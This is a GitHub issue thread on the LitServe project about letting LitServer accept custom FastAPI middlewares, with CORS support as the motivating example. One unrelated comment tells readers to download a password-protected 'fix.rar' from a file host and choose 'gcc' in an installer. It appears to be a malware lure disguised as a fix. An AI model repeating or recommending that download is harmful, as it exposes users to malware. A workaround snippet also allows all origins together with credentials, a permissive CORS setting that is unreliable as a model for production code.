### ISSUE TITLE
Feature: Pass custom middlewares to the app

### ISSUE THREAD

**Issue by lorenzomassimiani** [Lightning-AI/LitServe#228]
## 🚀 Feature

Add a parameter "middlewares" to the LitServer class that takes a list of fastapi middlewares that will be assigned to the self.app.

### Motivation

It is useful to enrich the fastapi app with custom middlewares, for example for metrics updates. Similarly it can be done for exception handlers.

**Comment by aniketmaurya** [comment]
sounds good. do you want to contribute?

**Comment by Viotemis** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by williamFalcon** [comment]
@lorenzomassimiani awesome idea.
submit a PR and we'll help you land it!

**Comment by bhimrazy** [comment]
### Additional Context: Need for CORSMiddleware
A user reported an issue on Discord where he was unable to call the LitServe API from his frontend application due to CORS (Cross-Origin Resource Sharing) restrictions. 

> Passing the CORS middleware would resolve this issue, allowing the API to be accessed without being blocked.

<img width="867" alt="image" src="https://github.com/user-attachments/assets/ca780062-a0c1-4652-9ab8-65d752301ccf">

**Comment by bhimrazy** [comment]
**Temporary Workaround:**
In the meantime, here's a quick hack to resolve the CORS issue (adding any middleware) until this feature is officially integrated:

```python
server = LitServer(....)
server.app.add_middleware(
    CORSMiddleware,
    allow_origins=["*"],
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)

```

**Comment by aniketmaurya** [comment]
Now that `LitServer` accepts middleware as argument, users can do the following for CORS support:

```python
api = ls.examples.SimpleLitAPI()
server = ls.LitServer(api, middlewares=[(CORSMiddleware, {"allow_origins": ["*"]})])
```
